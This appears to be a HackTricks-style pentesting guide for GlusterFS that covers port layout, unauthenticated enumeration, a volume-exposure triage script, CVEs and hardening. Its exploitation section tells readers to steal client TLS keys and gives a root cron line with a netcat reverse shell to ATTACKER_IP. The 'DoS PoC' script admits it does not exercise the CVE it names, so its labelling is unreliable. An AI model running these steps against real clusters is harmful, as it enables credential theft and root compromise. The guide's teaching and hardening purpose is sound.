# 24007-24008-24009-49152 - Pentesting GlusterFS
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**GlusterFS** is a **distributed file system** that aggregates storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens on **24007/TCP**; **24008/TCP** is its RDMA management port and is only open when RDMA transport is enabled. Each brick process (`glusterfsd`) gets its own data-plane port starting at **49152/TCP**, incrementing by one per brick. Releases before 3.4 allocated brick ports from **24009/TCP** upward, so you will still encounter those ports in legacy clusters.
```
PORT      STATE SERVICE       VERSION
24007/tcp open  glusterd      GlusterFS management (ONC RPC)
49152/tcp open  gluster-brick GlusterFS brick (TLS optional)
```
> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.
## Enumeration
Install the client utilities on your attacking box:
```bash
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
```
1. **Peer discovery & health**
```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```
2. **Volume reconnaissance**
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```
3. **Mount without privileges**
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```
If mounting fails, read the client-side log, which is named after the mount point with `/` replaced by `-` (for `/mnt/gluster` that is `/var/log/glusterfs/mnt-gluster.log`). Common causes are:
* TLS enforced on the volume (`client.ssl on` / `server.ssl on`, often combined with `auth.ssl-allow` to pin accepted certificate names)
* Address-based access control (`auth.allow` set to specific addresses or wildcards instead of the default `*`)
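The three steps above all boil down to reading the same `volume info all` text. As an added example (not code from the HackTricks page or the GlusterFS project), the script below parses that CLI output and flags every started volume that is mountable from any address without a client certificate, which turns the two failure causes above into a check you run before trying the mount. The sample output is constructed; `run_volume_info()` fetches live output when a host is passed on the command line.

```python
#!/usr/bin/env python3
"""Triage `gluster --remote-host <ip> volume info all` output.

Added example, not part of the HackTricks page or the GlusterFS project.
The CLI prints one blank-line-separated block per volume made of
`Field: value` lines; option keys are dotted (auth.allow, client.ssl, ...).
"""
import re
import subprocess
import sys

# Constructed sample output: one hardened volume and one wide-open admin volume.
SAMPLE = """\
Volume Name: data
Type: Replicate
Volume ID: 2f1d0c3a-0000-4000-8000-000000000001
Status: Started
Snapshot Count: 0
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: node1:/bricks/data
Brick2: node2:/bricks/data
Options Reconfigured:
auth.allow: 10.0.0.*
client.ssl: on
server.ssl: on
auth.ssl-allow: app1.example.com,app2.example.com
transport.address-family: inet
nfs.disable: on

Volume Name: gluster_shared_storage
Type: Replicate
Volume ID: 2f1d0c3a-0000-4000-8000-000000000002
Status: Started
Snapshot Count: 0
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: node1:/var/lib/glusterd/ss_brick
Brick2: node2:/var/lib/glusterd/ss_brick
Options Reconfigured:
cluster.enable-shared-storage: enable
transport.address-family: inet
nfs.disable: on
"""


def parse_volume_info(text):
    """Return {volume_name: {"status": str, "bricks": [str], "options": {key: value}}}."""
    volumes = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("Volume Name:"):
            current = {"status": "", "bricks": [], "options": {}}
            volumes[line.split(":", 1)[1].strip()] = current
        elif current is None or line in ("Bricks:", "Options Reconfigured:"):
            continue
        elif re.match(r"Brick\d+:", line):
            current["bricks"].append(line.split(":", 1)[1].strip())
        elif line.startswith("Status:"):
            current["status"] = line.split(":", 1)[1].strip()
        elif "." in line.split(":", 1)[0]:  # dotted key => a volume option
            key, value = line.split(":", 1)
            current["options"][key.strip()] = value.strip()
    return volumes


def exposure(vol):
    """List the reasons an arbitrary network client could mount this volume."""
    opts = vol["options"]
    reasons = []
    if vol["status"] != "Started":
        return reasons  # stopped volumes have no listening bricks
    if opts.get("auth.allow", "*") == "*":
        reasons.append("auth.allow is '*' (any address may mount)")
    if opts.get("client.ssl", "off") != "on" or opts.get("server.ssl", "off") != "on":
        reasons.append("TLS not enforced on the I/O path")
    elif not opts.get("auth.ssl-allow"):
        reasons.append("TLS on, but any certificate signed by the CA is accepted")
    return reasons


def exposed_volumes(text):
    """Map volume name -> findings, only for volumes with at least one finding."""
    return {name: exposure(v) for name, v in parse_volume_info(text).items() if exposure(v)}


def run_volume_info(host):
    """Fetch live output from a remote glusterd (requires glusterfs-cli)."""
    cmd = ["gluster", "--remote-host", host, "volume", "info", "all"]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    text = run_volume_info(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE
    for name, reasons in exposed_volumes(text).items():
        print(f"[!] {name}")
        for reason in reasons:
            print(f"    - {reason}")
```

Volumes that come back empty from `exposure()` are the ones where you will need stolen certificates or an allow-listed source address before `mount -t glusterfs` succeeds.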
### Certificate troubleshooting
Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory named in the error log). If the volume pins certificate names with `auth.ssl-allow`, the CN of the stolen certificate must be on that list; if the cluster also encrypts the management path, create the empty file `/var/lib/glusterd/secure-access` on your client as well.
```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```
---
## Known Vulnerabilities
| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` (`dht-common.c`) reachable over the network | Remote **DoS**; the UAF is a memory-corruption primitive, but no public RCE exists. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | 11.0 | Stack-based buffer over-read in the FUSE bridge `notify` handler (`fuse-bridge.c`) | Crash of the mounting client via crafted FS operations; public PoC available. |
| **CVE-2018-1088** | 3.x / 4.0 releases before the 2018 fix | Snapshot-scheduler cron file kept on `gluster_shared_storage` and executed as root | Any client allowed to mount volumes can mount the shared-storage volume and schedule a root cron job: the **priv-esc** explained below. |
> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.
### Exploiting `gluster_shared_storage` (Privilege Escalation)
`gluster_shared_storage` is the replicated volume glusterd creates when `cluster.enable-shared-storage` is turned on; every node mounts it at `/run/gluster/shared_storage` (`/var/run/gluster/shared_storage` on older releases) and the snapshot scheduler, geo-replication and NFS-Ganesha keep their shared state there. Like any other volume it ships with `auth.allow` set to `*`, so whoever can reach the bricks can mount it. The snapshot scheduler (`snap_scheduler.py`) writes its cron entries to `snaps/glusterfs_snap_cron_tasks` inside that volume and, on vulnerable releases (CVE-2018-1088), `/etc/cron.d/glusterfs_snap_cron_tasks` on every node is a symlink to that file, so anything appended there runs as **root** on every node.
```bash
# 1. Mount the admin volume from the attacking box (no credentials needed while auth.allow is '*')
mkdir -p /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss
# 2. Check whether the snapshot scheduler has ever been enabled
ls -la /tmp/gss/ /tmp/gss/snaps/ 2>/dev/null
# 3. Append a cron.d-style line; on vulnerable nodes /etc/cron.d/glusterfs_snap_cron_tasks points at this file
echo '* * * * * root nc -e /bin/bash ATTACKER_IP 4444' >> /tmp/gss/snaps/glusterfs_snap_cron_tasks
# 4. cron re-reads /etc/cron.d within a minute; catch the shell with: nc -lvnp 4444
```
If `snaps/` does not exist the scheduler was never enabled and this path is closed; the volume is still worth reading for geo-replication and NFS-Ganesha configuration, and on patched releases the cron file is no longer consumed directly from the shared mount.
### Denial-of-Service PoC (CVE-2023-26253)
```python
#!/usr/bin/env python3
# Minimal reproducer: sends one malformed RPC record (4 bytes of garbage) to glusterd on 24007.
# xdrlib was removed in Python 3.13, so the XDR unsigned int is packed with struct directly.
import socket
import struct

TARGET = ("10.10.11.131", 24007)

payload = struct.pack("!I", 0xDEADBEEF)                 # one XDR uint, not a valid RPC call header
header = struct.pack("!I", len(payload) | 0x80000000)   # record mark: last-fragment bit | length

with socket.create_connection(TARGET, timeout=5) as s:
    s.sendall(header + payload)
    try:
        print(s.recv(4096))                             # a healthy glusterd normally just drops the connection
    except socket.timeout:
        print("no reply")
```
The published bug lives in the FUSE client's `notify` handler, so this frame exercises glusterd's RPC record decoder rather than the CVE's own code path; whether anything falls over depends on the build. Check `gluster --version` and `/var/log/glusterfs/glusterd.log` on the target before drawing conclusions.
---
## Hardening & Detection
* **Upgrade** every node to a maintained 11.x release; the CVEs above are fixed there, and mixed-version clusters keep the old bugs alive on the lagging nodes.
* Enable **TLS** on the I/O path of every volume and pin which client certificates may mount (certificates live in `/etc/ssl/glusterfs.pem`, `glusterfs.key` and `glusterfs.ca` on each node and client):
```bash
gluster volume set <vol> client.ssl on
gluster volume set <vol> server.ssl on
gluster volume set <vol> auth.ssl-allow 'client1.example.com,client2.example.com'   # CNs allowed to mount
```
To encrypt the management path on 24007 as well, create the empty file `/var/lib/glusterd/secure-access` on all nodes and clients and restart `glusterd`.
* Restrict clients by address; `auth.allow` takes comma-separated IPs, hostnames or wildcards and defaults to `*`:
```bash
gluster volume set <vol> auth.allow '10.0.0.*'
```
* Expose 24007 and the brick range (49152 and up) only on a **private VLAN**, behind a host firewall, or through SSH tunnels.
* Watch the logs: `tail -f /var/log/glusterfs/glusterd.log` for peer and volume changes, `/var/log/glusterfs/bricks/*.log` for client connections and authentication failures, and raise `diagnostics.brick-log-level` / `diagnostics.client-log-level` while investigating. Alert on unexpected writes under the `gluster_shared_storage` mount.
---
## References
* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}